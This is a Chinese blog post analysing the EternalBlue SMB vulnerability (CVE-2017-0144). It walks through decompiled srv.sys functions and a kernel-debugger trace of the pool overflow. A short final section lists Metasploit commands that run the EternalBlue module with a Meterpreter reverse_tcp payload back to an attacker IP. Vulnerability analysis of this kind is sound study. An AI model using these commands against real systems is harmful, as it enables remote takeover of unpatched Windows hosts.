CVE-2017-0144 (Windows server 2008系列缓冲区溢出漏洞)

最新推荐文章于 2024-06-30 09:37:32 发布
最新推荐文章于 2024-06-30 09:37:32 发布
阅读量8.5k 收藏 5
点赞数 1

漏洞原理

srv.sys在处理SrvOs2FeaListSizeToNt的时候逻辑不正确导致越界拷贝。我们首先看下漏洞的触发点:

unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2)
{
  int v4; // edi@1
  _BYTE *v5; // edi@1
  unsigned int result; // eax@1
  v4 = a1 + 8;
  *(_BYTE *)(a1 + 4) = *(_BYTE *)a2;
  *(_BYTE *)(a1 + 5) = *(_BYTE *)(a2 + 1);
  *(_WORD *)(a1 + 6) = *(_WORD *)(a2 + 2);
  _memmove((void *)(a1 + 8), (const void *)(a2 + 4), *(_BYTE *)(a2 + 1));
  v5 = (_BYTE *)(*(_BYTE *)(a1 + 5) + v4);
  *v5++ = 0;
  _memmove(v5, (const void *)(a2 + 5 + *(_BYTE *)(a1 + 5)), *(_WORD *)(a1 + 6)); //这里产生的越界覆盖
  result = (unsigned int)&v5[*(_WORD *)(a1 + 6) + 3] & 0xFFFFFFFC;
  *(_DWORD *)a1 = result - a1;
  return result;
}

发生越界的地方见上面第二个memmove。调试的时候可以这样下断点:

kd> u srv!SrvOs2FeaToNt+0x4d
srv!SrvOs2FeaToNt+0x4d:
9877b278 ff15e0a07698    call    dword ptr [srv!_imp__memmove (9876a0e0)]
9877b27e 0fb74606        movzx   eax,word ptr [esi+6]
9877b282 8d441803        lea     eax,[eax+ebx+3]
9877b286 83e0fc          and     eax,0FFFFFFFCh
9877b289 83c418          add     esp,18h
9877b28c 8bc8            mov     ecx,eax
9877b28e 2bce            sub     ecx,esi
9877b290 5f              pop     edi
//最后一次越界的拷贝的长度是0xa8
ba e1 srv!SrvOs2FeaToNt+0x4d ".if(poi(esp+8) != a8){gc} .else {}"
这么设断点的原因是最后一次越界的拷贝的长度是0xa8,断下来后可以发现:
kd> dd esp
99803b38  88c8dff9 a3fc203a 000000a8 88c8dff8
99803b48  a3fc2039 00000000 a3fb20d8 a3fc2035
99803b58  a3fd2030 99803b7c 9877b603 88c8dff0
99803b68  a3fc2035 88307360 a3fb20b4 a3fb2008
99803b78  a3fc2035 99803bb4 98794602 88c8dff0
99803b88  99803bbc 99803ba8 99803bac 88307360
99803b98  a3fb2008 00000002 a3fb20b4 a3fb20d8
99803ba8  00010fe8 00000000 00000000 99803c00
kd> !pool 88c8dff9 
Pool page 88c8dff9 region is Nonpaged pool
*88c7d000 : large page allocation, tag is LSdb, size is 0x11000 bytes
 Pooltag LSdb : SMB1 data buffer, Binary : srv.sys
kd> !pool 88c8e009 
Pool page 88c8e009 region is Nonpaged pool
 88c8e000 size:    8 previous size:    0  (Free)       ....
88c8e008 doesn't look like a valid small pool allocation, checking to see
if the entire page is actually part of a large page allocation...
*88c8e000 : large page allocation, tag is LSbf, size is 0x11000 bytes
Pooltag LSbf : SMB1 buffer descriptor or srvnet allocation, Binary : srvnet.sys
kd> ? 88c7d000 +11000
Evaluate expression: -2000101376 = 88c8e000
kd> ? 88c8dff9 +a8
Evaluate expression: -2000101215 = 88c8e0a1 //这里明显越界了。

我们可以从上面的调试记录看到明显的越写拷贝操作。可以看到被覆盖的是SMB1buffer是有srvnet.sys分配的。这里exploit精心布局好的,是通过pool喷射的将两个pool连接在一起的。覆盖后面的这个pool有啥用后面会提到。

unsigned int __fastcall SrvOs2FeaListSizeToNt(int pOs2Fea)
{
  unsigned int v1; // edi@1
  int Length; // ebx@1
  int pBody; // esi@1
  unsigned int v4; // ebx@1
  int v5; // ecx@3
  int v8; // [sp+10h] [bp-8h]@3
  unsigned int v9; // [sp+14h] [bp-4h]@1
  v1 = 0;
  Length = *(_DWORD *)pOs2Fea;
  pBody = pOs2Fea + 4;
  v9 = 0;
  v4 = pOs2Fea + Length;
  while ( pBody < v4 )
  {
    if ( pBody + 4 >= v4
      || (v5 = *(_BYTE *)(pBody + 1) + *(_WORD *)(pBody + 2),
          v8 = *(_BYTE *)(pBody + 1) + *(_WORD *)(pBody + 2),
          v5 + pBody + 5 > v4) )
    {
      //
      // 注意这里修改了Os2Fea的Length,自动适应大小
      // 初始值是0x10000,最终变成了0x1ff5d
      //
      *(_WORD *)pOs2Fea = pBody - pOs2Fea;
      return v1;
    }
    if ( RtlULongAdd(v1, (v5 + 0xC) & 0xFFFFFFFC, &v9) < 0 )
      return 0;
    v1 = v9;
    pBody += v8 + 5;
  }
  return v1;
}
unsigned int __fastcall SrvOs2FeaListToNt(int pOs2Fea, int *pArgNtFea, int *a3, _WORD *a4)
{
  __int16 v5; // bx@1
  unsigned int Size; // eax@1
  NTFEA *pNtFea; // ecx@3
  int pOs2FeaBody; // esi@9
  int v10; // edx@9
  unsigned int v11; // esi@14
  int v12; // [sp+Ch] [bp-Ch]@11
  unsigned int v14; // [sp+20h] [bp+8h]@9
  v5 = 0;
  Size = SrvOs2FeaListSizeToNt(pOs2Fea);
  *a3 = Size;
  if ( !Size )
  {
    *a4 = 0;
    return 0xC098F0FF;
  }
  pNtFea = (NTFEA *)SrvAllocateNonPagedPool(Size, 0x15);
  *pArgNtFea = (int)pNtFea;
  if ( pNtFea )
  {
    pOs2FeaBody = pOs2Fea + 4;
    v10 = (int)pNtFea;
    v14 = pOs2Fea + *(_DWORD *)pOs2Fea - 5;
    if ( pOs2Fea + 4 > v14 )
    {
LABEL_13:
      if ( pOs2FeaBody == pOs2Fea + *(_DWORD *)pOs2Fea )
      {
        *(_DWORD *)v10 = 0;
        return 0;
      }
      v11 = 0xC0000001;
      *a4 = v5 - pOs2Fea;
    }
    else
    {
      while ( !(*(_BYTE *)pOs2FeaBody & 0x7F) )
      {
        v12 = (int)pNtFea;
        v5 = pOs2FeaBody;
        pNtFea = (NTFEA *)SrvOs2FeaToNt(pNtFea, pOs2FeaBody);
        pOs2FeaBody += *(_BYTE *)(pOs2FeaBody + 1) + *(_WORD *)(pOs2FeaBody + 2) + 5;
        //
        // 由于SrvOs2FeaListSizeToNt将pOs2Fea的Length改大了。
        // 而且变得大了不少,所以这里的判读就没有什么意义了。最终导致越界的产生。
        //
        if ( pOs2FeaBody > v14 )
        {
          v10 = v12;
          goto LABEL_13;
        }
      }
      *a4 = pOs2FeaBody - pOs2Fea;
      v11 = 0xC000000D;
    }
    SrvFreeNonPagedPool(*pArgNtFea);
    return v11;
  }
  if ( BYTE1(WPP_GLOBAL_Control->Flags) >= 2u && WPP_GLOBAL_Control->Characteristics & 1 && KeGetCurrentIrql() < 2u )
  {
    _DbgPrint("SrvOs2FeaListToNt: Unable to allocate %d bytes from nonpaged pool.", *a3, 0);
    _DbgPrint("\n");
  }
  return 0xC0000205;
}

首先SrvOs2FeaListToNt首先调用SrvOs2FeaListSizeToNt计算pNtFea的大小。这里注意了SrvOs2FeaListSizeToNt函数会修改原始的pOs2Fea中的Length大小,然后以计算出来的Length来分配pNtFea.最后调用SrvOs2FeaToNt来实现转换。SrvOs2FeaToNt后面的判断就有问题了。这里还不止一个问题。

1. 转换完成后,增加pOs2FeaBody然后比较。正确的逻辑难道不应该是先判断再转换吗?

2. 由于SrvOs2FeaListSizeToNt中改变了pOs2Fealength的值,这里使用变大后的值做比较,肯定会越界。

漏洞攻击流程

靶机IP地址


攻击机ip

启动metasexploit

use exploit/windows/smb/ms17_010_eternalbluer

set LHOST 攻击机ip
set RHOST 靶机ip
set PAYLOAD windows/x64/meterpreter/reverse_tcp

运行exploit开始渗透

成功!



FLy_鹏程万里
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-0100:CVE-2017-0100,MS17-012,Eop
03-25
漏洞是由于SMBv1(SMB协议的第一个版本)中的一个缓冲区溢出错误,攻击者可以利用这个错误来执行任意代码,从而完全控制受影响的系统。一旦攻击成功,攻击者可以安装程序,查看、更改或删除数据,甚至创建具有完全...
CVE-2015-1805漏洞验证
05-17
2. CVE-2015-3864:此漏洞源于解码某些媒体文件时的缓冲区溢出,可能导致服务崩溃或权限提升。 3. CVE-2015-3876:此问题存在于音频编解码器中,攻击者可以利用此漏洞触发内存破坏,实现远程代码执行。 4. CVE-2015-...
漏洞复现_CVE-2017-0144 “永恒之蓝”漏洞
qq_51550750的博客
06-02 3080
漏洞复现_CVE-2017-0144“永恒之蓝”漏洞
SMB MS17-010 利用(CVE-2017-0144
weixin_30408309的博客
08-10 904
exploit-db :https://www.exploit-db.com/exploits/42315/ 该漏洞的影响版本很广泛:Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) 具体请查看公告:Microsoft 安全公...
路由器——缓冲区溢出漏洞
qq_67181251的博客
06-30 262
栈操作:MIPS32架构堆栈与x86架构一样,都是向低地址增长的。但在MIPS32架构中没有EBP(栈底指针),进入一个函数时,需要将当前栈指针向下移动n比特,这个大小为n比特的存储空间就是此函数的Stack Frame的存储区域。此后,栈指针便不再移动,只能在函数返回时将栈指针加上这个偏移量恢复栈现场。由于不能随便移动栈指针,所以寄存器压栈和出栈时都必须指定偏移量。调用:调用:如果函数A调用函数B,调用者函数(函数A)会在自己的栈顶预留一部分空间来保存被调用者(函数B)的参数,我们称之为调用参数空间。
CVE-2017-0144 EternalBlue(永恒之蓝)漏洞分析
子曰小玖的博客
04-08 6963
前言 EternalBlue(永恒之蓝)据称是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的模块,由于其涉及漏洞的影响广泛性及利用稳定性,在被公开以后为破坏性巨大的勒索蠕虫 WannaCry所用而名噪一时。360威胁情报中心对于WannaCry的活动持续地进行着监控,我们看到的趋势是 WannaCry的感染量还在增加,说明作为蠕虫主要传播手段的EternalBlue相应的漏洞还大量存在...
永恒之蓝漏洞CVE-2017-0144)复现
LRainner的博客
03-04 4603
永恒之蓝漏洞CVE-2017-0144)复现 环境搭建 一台kali攻击机 一台windows7靶机 信息收集 ifconfig 查看kali的ip地址为192.168.125.25 使用nmap扫描192.168.125.0网段下存活的主机 nmap 192.168.125.25/24 判断靶机ip地址为192.168.125.151 nmap -O 192.168.125.151 判断靶机为Windows 7|2008|8.1 使用永恒之蓝进行攻击 msfconsole进入metasploit控
msf复现利用永恒之蓝【MS17_010】CVE-2017-0144漏洞
qq_58873970的博客
07-28 415
SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。漏洞复现是一个排错的过程,要善于利用互联网这个工具进行排难。
【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】
Shadow_DAI_990101的博客
08-31 815
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复确保防病毒软件是最新的。实施数据备份和恢复计划,将敏感或专有数据的副本保存在单独且安全的位置。...
CVE-2024-38077是一个关于Windows远程桌面许可服务的远程代码执行漏洞.docx
最新发布
08-13
漏洞成因:RDL服务未能正确处理特制的RDP协议流量,允许未经身份验证的威胁者连接到远程桌面授权服务并发送恶意消息,从而触发缓冲区溢出,在目标系统上执行任意代码。 攻击方式:攻击者无需任何前置条件或用户交互...
cve-2018-8120
05-18
【标题】:“CVE-2018-8120:Windows LSA远程代码执行漏洞” 【正文】: CVE-2018-8120是2018年发现...同时,对C++程序员来说,了解如何避免潜在的安全陷阱,如内存泄漏和缓冲区溢出,是确保编写安全可靠代码的关键。
永恒之蓝漏洞复现(Windows server 2008系列缓冲区溢出漏洞
weixin_44970417的博客
07-25 2542
漏洞信息 漏洞名称:Windows server 2008系列缓冲区溢出漏洞 CVEID:2017-0144 漏洞类型:输入验证错误 威胁类型:远程 发布时间:2017-03-14 危害等级:高危 漏洞简介:Microsoft服务器消息块1.0(SMBv1)服务器处理某些请求的方式中存在一个远程执行代码漏洞Windows Server 2008 SP2和R2 SP1以及Windows server 2016允许远程攻击者通过精心制作的数据包(也称为“Windows SMB远程代码执行漏洞”)在目标服务器上
SMB MS17-010 利用(CVE-2017-0144 永恒之蓝 )
子曰小玖的博客
04-20 3180
一、基础知识介绍: 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
基于 Win Server 2008 复现 IPC$ 漏洞
Welcome To Myon'Blog !
03-07 1786
所有的这些初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者会利用 IPC$ ,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测。为了配合IPC共享工作,Windows操作系统(不包括Windows 98系列)在安装完成后,自动设置共享的目录为:C盘、D盘、E盘、ADMIN目录(C:\Windows)等,即为 ADMIN$、C$、D$、E$ 等,但要注意,这些共享是隐藏的,只有管理员能够对他们进行远程操作。(相当于是限定我们的渗透方向)。
windows 2008r2 内存溢出补丁_漏洞情报2020年11月“微软补丁日” 多个产品爆高危漏洞CVE202017051/CVE202017087)...
weixin_36319281的博客
02-04 637
近日,腾讯云安全运营中心监测到,微软发布了2020年11月的一批软件安全更新,修补了总共112个漏洞,其中包含17个严重漏洞,这些漏洞影响Windows操作系统和相关产品的各种版本。为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。漏洞详情在此次公告中有三个漏洞需要引起关注:1、CVE-2020-17051:该漏洞为Win...
MS17-010 EternalBlue 漏洞分析
热门推荐
weixin_43526443的博客
02-06 7万+
转自:圈子社区 原文地址:https://www.jianshu.com/u/58a5f9e596a7 作者:一个二进制安全菜鸡 猫头鹰安全团队-ZSD 目录 Part1 简介 Part2 漏洞信息 1 漏洞存在文件信息 2 漏洞利用关键模块信息: 3 漏洞介绍 Part3 静态分析 Part4 动态分析 Part5 利用详细 Part6 最后 Part7 参考 Part1 简介 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏...
勒索病毒尝试解决方法
灵感点滴的分享
05-16 7965
解决方案 该攻击涉及MS17-010漏洞,我们可以采用以下方案进行解决 漏洞名称: Microsoft Windows SMB远程任意代码执行漏洞 (MS17-010) 包含如下CVECVE-2017-0143 严重 远程命令执行 CVE-2017-0144 严重 远程命令执行 CVE-2017-0145 严重 远程命令执行 CVE-2017-0146 严重 远程命令执行
【openEuler开源社区】如何为社区修复CVE漏洞
weixin_44569394的博客
06-18 3954
如何为openEuler开源社区修复CVE漏洞
CVE-2017-0144
01-16
CVE-2017-0144,也被称为“永恒之蓝”漏洞,是一种影响Windows操作系统的缓冲区溢出漏洞。该漏洞允许远程攻击者在目标系统上执行任意代码,从而获取系统的完全控制权限。 该漏洞的利用方式是通过发送特制的SMB(Server Message Block)请求到目标系统上的SMB服务,从而触发缓冲区溢出。攻击者可以利用这个漏洞来执行恶意代码,获取系统的敏感信息,或者在目标系统上进行其他恶意活动。 为了防止受到CVE-2017-0144漏洞的攻击,建议您采取以下措施: 1. 及时更新操作系统:确保您的Windows操作系统已经安装了最新的安全补丁和更新。 2. 启用防火墙:配置和启用防火墙,限制对SMB服务的访问。 3. 禁用SMBv1:由于CVE-0144主要影响SMBv1协议,建议禁用SMBv1以减少受攻击的风险。 4. 使用网络隔离措施:将受影响的系统与其他系统隔离,以防止漏洞的传播。 5. 安装安全软件:使用可靠的安全软件来检测和阻止恶意活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值